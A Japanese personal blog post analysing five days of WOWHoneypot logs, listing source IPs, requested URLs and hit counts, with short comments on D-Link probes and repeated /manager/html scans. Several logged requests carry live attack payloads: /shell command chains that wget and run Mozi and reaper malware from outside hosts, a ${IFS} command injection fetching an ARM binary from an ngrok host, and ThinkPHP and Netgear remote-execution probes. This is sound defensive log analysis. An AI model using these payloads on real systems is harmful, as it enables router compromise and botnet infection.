家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

Wowhoneypotログ分析(2020/05/18-2020/05/22)

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

 

 

 

対象期間

2020/05/18-2020/05/22

 

ログの集計

送信元 内容 検知数
    0
105.155.16.59 \"POST /cgi-bin/mainfunction.cgi 1
114.67.202.10 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
122.3.5.173 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 1
128.14.134.170 \"GET /solr/ 1
131.108.4.154 \"POST /boaform/admin/formPing 1
137.135.86.214 \"HEAD /robots.txt 1
139.204.119.157 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
151.99.146.218 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
162.243.135.242 \"GET /portal/redlion 1
162.243.137.209 \"GET /hudson 1
162.243.139.107 \"GET /ReportServer 1
162.243.143.216 \"GET /portal/redlion 1
162.243.144.248 \"GET /manager/html 3
162.243.145.56 \"GET /portal/redlion 1
162.243.145.76 \"GET /portal/redlion 3
162.244.80.180 \"GET /_async/AsyncResponseServiceHttps 6
  \"GET /actionHandler/ajax_network_diagnostic_tools.php 12
  \"GET /admin.cgi 6
  \"GET /api/backup/logout.cgi 6
  \"GET /api/project/repo/log/graph/1 6
  \"GET /apply.cgi 6
  \"GET /apps/a3/cfg_ethping.cgi 6
  \"GET /awcuser/cgi-bin/vcs 6
  \"GET /ayefeaturesconvert.js 12
  \"GET /boaform/admin/formPing 12
  \"GET /boardData102.php 6
  \"GET /boardData103.php 12
  \"GET /boardDataJP.php 6
  \"GET /boardDataWW.php 6
  \"GET /card_scan_decoder.php 6
  \"GET /ccbill/whereami.cgi 6
  \"GET /cgi-bin/admin/servetest 12
  \"GET /cgi-bin/adv_remotelog.asp 12
  \"GET /cgi-bin/ccbill/whereami.cgi 6
  \"GET /cgi-bin/cgi_system?cmd=saveconfig 12
  \"GET /cgi-bin/diagnostic.cgi 6
  \"GET /cgi-bin/file_transfer.cgi 6
  \"GET /cgi-bin/luci/expert/maintenance/diagnostic/nslookup 12
  \"GET /cgi-bin/masterCGI 6
  \"GET /cgi-bin/nobody/Search.cgi 6
  \"GET /cgi-bin/pages/maintenance/logSetting/logSet.asp 12
  \"GET /cgi-bin/preview_email.cgi 6
  \"GET /cgi-bin/protected/discover_and_manage.cgi 6
  \"GET /cgi-bin/rdfs.cgi 6
  \"GET /cgi-bin/script 6
  \"GET /cgi-bin/spboard/board.cgi 12
  \"GET /cgi-bin/tools_time.asp 12
  \"GET /cgi-bin/ViewLog.asp 12
  \"GET /cgi-bin/webcm 6
  \"GET /cgi-bin/webctrl.cgi 6
  \"GET /command.php 6
  \"GET /console/login/LoginForm.jsp 12
  \"GET /diagnostic.php 6
  \"GET /dnslookup.cgi 6
  \"GET /dogfood/mail/spell.php 6
  \"GET /globe 6
  \"GET /handle_iscsi.php 6
  \"GET /HNAP1 6
  \"GET /horde/imp/test.php 6
  \"GET /imp/test.php 6
  \"GET /incl/image_test.shtml 6
  \"GET /language/Swedish 12
  \"GET /login_handler.php 12
  \"GET /login.cgi 12
  \"GET /login.fcgi 12
  \"GET /maker/snwrite.cgi 12
  \"GET /moadmin/moadmin.php 6
  \"GET /monitor/op5/nacoma/command_test.php 6
  \"GET /NonExistence 12
  \"GET /op5config/welcome 3
  \"GET /page/maintenance/lanSettings/dns 6
  \"GET /Pages/login.htm 12
  \"GET /pages/systemcall.php 12
  \"GET /picsdesc.xml 6
  \"GET /ping.cgi 6
  \"GET /qsrserver/device/getThumbnail 6
  \"GET /repository/annotate?rev=1 6
  \"GET /scripts/ajaxPortal.lua 6
  \"GET /scripts/rpc.php 3
  \"GET /service/krashrpt.php 6
  \"GET /setsysname.fcgi 6
  \"GET /setSystemCommand 6
  \"GET /setup.cgi 12
  \"GET /smartdomuspad/modules/reporting/track_import_export.php 9
  \"GET /softnas/snserver/snserv.php 6
  \"GET /stainfo.cgi 6
  \"GET /tmBlock.cgi 6
  \"GET /uapi-cgi/viewer/testaction.cgi 12
  \"GET /upgrade_handle.php 6
  \"GET /users/%2f/%2fproc%2fself%2fcomm 6
  \"GET /web/cgi-bin/usbinteract.cgi 12
  \"GET /webadmin/script 6
  \"GET /wp-content/plugins/dzs-videogallery/img.php 6
167.172.158.192 \"GET /phpMyAdmin/scripts/setup.php 11
  \"POST /phpMyAdmin/scripts/setup.php 11
180.116.46.6 \"POST /GponForm/diag_Form?images/ 3
181.143.221.68 \"POST /cgi-bin/mainfunction.cgi 1
185.128.41.50 \"GET /manager/html 784
186.225.180.144 \"POST /cgi-bin/mainfunction.cgi 1
192.34.60.27 \"GET /index.php 1
193.118.53.194 \"GET /Telerik.Web.UI.WebResource.axd?type=rau 1
194.190.49.175 \"POST /cgi-bin/mainfunction.cgi 1
195.54.160.123 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 10
  \"GET /?XDEBUG_SESSION_START=phpstorm 10
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 10
  \"GET /solr/admin/info/system?wt=json 10
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 9
  \"POST /api/jsonws/invoke 10
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 9
2.50.36.252 \"POST /cgi-bin/mainfunction.cgi 1
200.116.13.19 \"POST /cgi-bin/mainfunction.cgi 1
23.95.186.173 \"GET http://steamcommunity.com/ 1
42.239.113.233 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 1
45.13.93.82 \"CONNECT ip.ws.126.net:443 3
5.101.0.209 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1
  \"GET /?XDEBUG_SESSION_START=phpstorm 1
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 1
  \"GET /solr/admin/info/system?wt=json 1
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 1
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
51.81.21.185 \"GET /shell?cd+/tmp;rm+-rf+*;wget+%2045.56.118.219/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 1
58.217.6.136 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 3
74.105.81.187 \"POST /cgi-bin/mainfunction.cgi 1
79.52.17.137 \"GET /adv 1
80.82.68.17 \"GET /favicon.ico 1
  \"GET /robots.txt 1
80.82.68.69 \"GET /favicon.ico 1
  \"GET /robots.txt 1
80.82.77.33 \"GET /.well-known/security.txt 3
  \"GET /favicon.ico 3
  \"GET /robots.txt 3
  \"GET /sitemap.xml 3
86.98.19.31 \"POST /boaform/admin/formPing 3
93.147.45.242 \"GET /adv 1
93.39.97.39 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1

 

コメント

  • 「ayefeaturesconvert.js」はD-Link製のルータに対する攻撃と推測

    www.exploit-db.com

  • 「GET /manager/html」を784回検知している。(前の期間では181回)
    ユーザエージェントを見てみると「User-Agent: Java/1.8.0_131」等となっており、botからのアクセスと推測
    ユーザエージェントを調べられるサイト

    developers.whatismybrowser.com

  • なぜかsteamcommunityにアクセスさせるリクエストが来ている。
    「GET http://steamcommunity.com/